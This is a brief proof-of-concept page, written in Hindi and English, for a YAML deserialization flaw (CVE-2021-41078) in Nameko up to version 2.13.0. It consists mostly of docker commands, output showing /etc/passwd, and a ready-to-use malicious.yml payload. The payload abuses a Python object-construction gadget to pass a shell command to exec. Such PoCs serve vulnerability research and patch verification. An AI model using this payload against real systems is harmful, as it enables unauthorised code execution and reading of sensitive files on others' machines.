
nameko YAML डिसीरियलाइज़ेशन के कारण मनमाना कोड निष्पादन
nameko YAML deserialization के कारण मनमाना कोड निष्पादन
Nameko 2.13.0 तक कॉन्फ़िग फ़ाइल को deserialize करते समय मनमाना कोड निष्पादन करने के लिए धोखा दिया जा सकता है।

docker build -t cve-2021-41078 .
docker run -it --rm cve-2021-41078
आउटपुट /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"